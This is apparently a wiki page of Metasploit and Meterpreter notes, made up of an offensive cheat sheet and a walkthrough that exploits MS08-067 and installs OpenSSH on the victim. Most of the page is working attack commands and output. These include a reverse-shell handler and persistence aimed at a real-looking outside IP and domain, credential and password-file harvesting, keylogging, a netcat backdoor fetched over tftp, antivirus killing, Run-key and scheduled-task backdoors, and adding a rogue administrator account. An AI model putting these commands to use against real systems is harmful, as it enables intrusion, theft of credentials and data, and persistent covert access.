MSF
Overview
Steps:
1. Pick which exploit to use 2. Configure the exploit with remote IP address and remote port number 3. Pick a payload 4. Configure the payload with local IP address and local port number 5. Execute the exploit
Common Commands
msfconsole show expolit windows use iis50_webdav_ntdll show options set RHOST <IP address> set RPORT 80 check show targets show payloads set PAYLOAD win32_reverse show options set LHOST <your IP address show advanced exploit
Complete Cheatsheet
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST rmccurdy.com set LPORT 21 set ExitOnSession false # set AutoRunScript pathto script you want to autorun after exploit is run set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
exploit -j -z
file_autopwn
rm -Rf /tmp/1 mkdir /tmp/1 rm -Rf ~/.msf3
wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressReleases/Press%20Releases/nga10_02.pdf
./msfconsole
db_driver sqlite3 db_create pentest11 setg LHOST 75.139.158.51 setg LPORT 21 setg SRVPORT 21 setg LPORT_WIN32 21
setg INFILENAME /tmp/file3.pdf
use auxiliary/server/file_autopwn
set OUTPATH /tmp/1
set URIPATH /msf set SSL true set ExitOnSession false set PAYLOAD windows/meterpreter/reverse_tcp setg PAYLOAD windows/meterpreter/reverse_tcp set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30 run
shows all the scripts
run [tab]
persistence! broken ...if you use DNS name ..
run persistence -r 75.139.158.51 -p 21 -A -X -i 30
run get_pidgin_creds
idletime sysinfo
SYSTEM SHELL ( pick a proc that is run by system )
migrate 376 shell
session hijack tokens
use incognito impersonate_token "NT AUTHORITY\\SYSTEM"
escalate to system
use priv getsystem
execute -f cmd.exe -H -c -i -t execute -f cmd.exe -i -t
list top used apps
run prefetchtool -x 20
list installed apps
run prefetchtool -p
run get_local_subnets
find and download files
run search_dwld "%USERPROFILE%\\my documents" passwd run search_dwld "%USERPROFILE%\\desktop passwd run search_dwld "%USERPROFILE%\\my documents" office run search_dwld "%USERPROFILE%\\desktop" office
alternate
download -r "%USERPROFILE%\\desktop" ~/ download -r "%USERPROFILE%\\my documents" ~/
alternate to shell not SYSTEM
execute -f cmd.exe -H -c -i -t
does some run wmic commands etc
run winenum
rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4 run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
vnc / port fwd for linux
run vnc
priv esc
run kitrap0d
run getgui
somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!
run killav
run winemun run memdump
run screen_unlock
upload /tmp/system32.exe C:\\windows\\system32\\ reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe" reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v system32 reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list reg setval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v sys reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32 upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"
getuid ps getpid keyscan_start keyscan_dump migrate 520 portfwd add -L 10.4.4.4 -l 6666 -r 192.168.1.1 -p 80" portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666
shell run myremotefileserver_mserver -h run myremotefileserver_mserver -p 8787
run msf_bind run msf_bind -p 1975 rev2self getuid
getuid
enumdesktops grabdesktop
run deploymsf -f framework-3.3-dev.exe
run hashdump run metsvc run scraper run checkvm run keylogrecorder run netenum -fl -hl localhostlist.txt -d google.com run netenum -rl -r 10.192.0.50-10.192.0.254 run netenum -st -d google.com run netenum -ps -r 10.192.0.50-254
Windows Login Brute Force Meterpreter Script
run winbf -h
upload a script or executable and run it
uploadexec
Using Payload As A Backdoor from a shell
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe" SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe" /ED 11/11/2011
kill AV this will not unload it from mem it needs reboot or kill from memory still ... Darkspy, Seem, Icesword GUI can kill the tasks
catchme.exe -K "c:\Program Files\Kaspersky\avp.exe" catchme.exe -E "c:\Program Files\Kaspersky\avp.exe" catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" dummy
- Nessus Scanning through a Metasploit Meterpreter Session
Scenario: You are doing a penetration test. The client's internet face is locked down pretty well. No services are exposed externally and only HTTP/HTTPS are allowed OUT of the corporate firewall. You email in a carefully crafted email with the meterpreter attacked. An accommodating users is more than happy to click your attachment giving you meterpreter access to their machine. Now what? How about using Nessus to scan all the services on their internal network?
The Players:
Attacker 172.16.186.132 Victim 172.16.186.126
Step 1 - After you have meterpreter access install OpenSSH on the victim's computer. Joff Thyer, packet guru, crazy aussie and all around smart guy did a great job of outlining the install process on his blog. I pretty much just followed his instructions here.
Step 2 - After you've installed OpenSSH and setup your account use Meterpreters PORTFWD command to forward a port from the attacker's machine to the SSH listener on the victim's machine. For example:
meterpreter> portfwd add -L 172.16.186.132 -l 8000 -r 172.16.186.128 -p 22
This command sets up a listener on port 8000 of the attacker's IP (172.16.186.132) and forwards packets to port 22 on the victim's machine (172.16.186.128).
Step 3 - SSH into the portfwd port you just created and setup a dynamic port forwarder on your machine. For example:
ssh -D 127.0.0.1:9000 -p 8000 [email protected]
This command sets up a SOCKS4 proxy on port 9000 which is forwarded through the SSH session on the victim.
Step 4 - Use PROXYCHAINS to forward your nessusd traffic through the SOCKS4 listener on port 9000. This is as simple as changing the TCP port on the last line of /etc/proxychains.conf from its default of 9050 to port 9000 and launching nessusd through proxychains as follows:
proxychains /usr/sbin/nessusd -D
Step 5 - Start the nessus client and do you scan.
Preparing for a custom command line OpenSSH Installation in your lab
The basic steps to prepare a command line OpenSSH installation for Windows are as follows:
1. Download the setupssh.exe installation package from http://sshwindows.sourceforge.net/download
2. Run the GUI installer package on your Windows lab/test machine. I suggest accepting the default program location of C:\Program Files\OpenSSH
3. Get a full copy of all of the files under the directory C:\Program Files\OpenSSH onto a USB flash drive or other favorite media. Copy recursively with XCOPY and make sure you fully retain the directory structure.
4. Export the following registry keys using the REG EXPORT command as follows:
REG EXPORT .HKLM\SOFTWARE\Cygnus Solutions. 1.REG REG EXPORT .HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd. 2.REG REG EXPORT .HKLM\SYSTEM\ControlSet001\Services\OpenSSHd. 3.REG
5. Concatenate all of these registry files together into one file.
TYPE 1.REG 2.REG 3.REG >OPENSSH.REG
6. Save this OPENSSH.REG file into your local copy of all of the openssh directory structure.
Performing an installation via command shell
Now that you have all of this data saved on your USB thumb drive, lets assume that our penetration testing machine is a CentOS Linux operating system with IP address of 192.168.1.37, and that our target is a Windows 2003 SP0 machine with IP address of 192.168.1.40. Our penetration testing Linux machine has our OpenSSH package files mounted under /mnt/PenTestTools/win32/OpenSSH.
Our target happens to have the MS08-067 Server Service RPC vulnerability. Below is an example of how we exploit this vulnerability using Metasploit (www.metasploit.com) with the Meterpreter payload, upload our OpenSSH server files, add a new username, perform some minimal configuration and start the OpenSSH service.
Exploiting the Vulnerability
[root@localhost framework-3.2]# nc -v 192.168.1.40 445 Connection to 192.168.1.40 445 port [tcp/microsoft-ds] succeeded! [root@localhost framework-3.2]# ./msfconsole
msf > search exploits ms08_067 [*] Searching loaded modules for pattern 'ms08_067'... Exploits ======== Name Description ---- ----------- windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > set RHOST 192.168.1.40 RHOST => 192.168.1.40 msf exploit(ms08_067_netapi) > set TARGET 5 TARGET => 5 msf exploit(ms08_067_netapi) > show options
... truncated output ... Exploit target:
Id Name -- ---- 5 Windows 2003 SP0 Universal
msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Triggering the vulnerability... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (192.168.1.37:45633 -> 192.168.1.40:4444)
meterpreter > sysinfo Computer: SYSTEM-HJ28HHGL7N OS : Windows .NET Server (Build 3790, ).
Uploading your OpenSSH Files
meterpreter > lcd /mnt/PenTestTools/win32/OpenSSH meterpreter > lpwd /mnt/PenTestTools/win32/OpenSSH meterpreter > cd \ meterpreter > cd "Program Files" meterpreter > mkdir openssh Creating directory: openssh meterpreter > cd openssh meterpreter > pwd C:\Program Files\openssh meterpreter > upload -r . . [*] uploading : ./uninstall.exe -> .\uninstall.exe [*] uploaded : ./uninstall.exe -> .\uninstall.exe [*] mirroring : ./bin -> .\bin [*] uploading : ./bin/chmod.exe -> .\bin\chmod.exe [*] uploaded : ./bin/chmod.exe -> .\bin\chmod.exe [*] uploading : ./bin/chown.exe -> .\bin\chown.exe [*] uploaded : ./bin/chown.exe -> .\bin\chown.exe [*] uploading : ./bin/cygcrypto-0.9.7.dll -> .\bin\cygcrypto-0.9.7.dll [*] uploaded : ./bin/cygcrypto-0.9.7.dll -> .\bin\cygcrypto-0.9.7.dll .... lots of output truncated ....
meterpreter > execute -f cmd.exe .i Process 848 created. Channel 66 created.
Modifying the Registry and Adding Your Own Username
Here, we import all of our registry keys, then add our own username making sure to put it into the administrators group. Then we create the passwd and group files that OpenSSH needs for authentication purposes.
Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\Program Files\openssh>whoami whoami nt authority\system
C:\Program Files\openssh>reg import openssh.reg reg import openssh.reg The operation completed successfully.
C:\Program Files\openssh>net user inet_p0wned gameover /add net user inet_p0wned gameover /add The command completed successfully.
C:\Program Files\openssh>net localgroup administrators inet_p0wned /add net localgroup administrators inet_p0wned /add The command completed successfully.
C:\Program Files\openssh>cd etc cd etc
C:\Program Files\openssh\etc>..\bin\mkpasswd -l >passwd ..\bin\mkpasswd -l >passwd C:\Program Files\openssh\etc>..\bin\mkgroup -l >group ..\bin\mkgroup -l >group
C:\Program Files\openssh\etc>sc create opensshd binpath= "c:\program files\openssh\bin\cygrunsrv.exe" start= auto sc create opensshd binpath= "c:\program files\openssh\bin\cygrunsrv.exe" start= auto [SC] CreateService SUCCESS
Start the OpenSSH Service
C:\Program Files\openssh\etc>sc start opensshd sc start opensshd SERVICE_NAME: opensshd TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 PID : 1916 FLAGS :
C:\Program Files\openssh\etc>sc query opensshd sc query opensshd SERVICE_NAME: opensshd TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0
C:\Program Files\openssh\etc>netsh firewall add port protocol=tcp port=22 name=sshd mode=enable scope=custom addresses=192.168.1.0/24
The following command was not found: firewall add port protocol=tcp port=22 name=sshd mode=enable scope=custom addresses=192.168.1.0/24**
- Note: adding a port for the firewall is necessary if the firewall exists. If not, then you will get the command not found error message. It is a good idea to restrict the source networks so that you don.t leave a gaping opportunity while testing.
C:\Program Files\openssh\etc>exit exit meterpreter > quit
[*] Meterpreter session 1 closed. msf exploit(ms08_067_netapi) > quit
Now, lets go ahead and SSH into our Windows server to check if things worked!
root@localhost:~/framework-3.2]# ssh [email protected] The authenticity of host '192.168.1.40 (192.168.1.40)' can't be established. RSA key fingerprint is ab:c8:bf:9f:b2:38:32:1d:6f:2b:34:a5:d0:99:dc:49. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.1.40' (RSA) to the list of known hosts.
OpenSSH for Windows. Welcome aboard!
[email protected]'s password: Could not chdir to home directory /home/inet_p0wned: No such file or directory Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\Program Files\OpenSSH> C:\Program Files\OpenSSH>whoami system-hj28hhgl7n\inet_p0wned
C:\Program Files\OpenSSH>exit Connection to 192.168.1.40 closed. [root@localhost framework-3.2]#
- Cleaning up:
To clean up everything when you are finished, you need to delete the OpenSSH service, delete the registry keys and remove all of the relevant files. The following recipe should work reasonably well from a command shell. Remember that you cannot be using OpenSSH when deleting the service! So, you may need to exploit again with shell code before removing it.
C:\> SC STOP opensshd C:\> SC DELETE opensshd C:\> REG DELETE .HKLM\SOFTWARE\Cygnus Solutions. /f /va C:\> REG DELETE .HKLM\SYSTEM\ControlSet001\Services\OpenSSHd. /f /va C:\> REG DELETE .HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd. /f /va
C:\> CD "\Program Files" C:\Program Files> RMDIR /Q /S opensshd C:\Program Files> NETSH FIREWALL DELETE PORT TCP 22 C:\Program Files> NET USER inet_p0wned /DELETE
{{#widget:DISQUS |id=networkm |uniqid=MSF |url=https://aman.awiki.org/wiki/MSF }}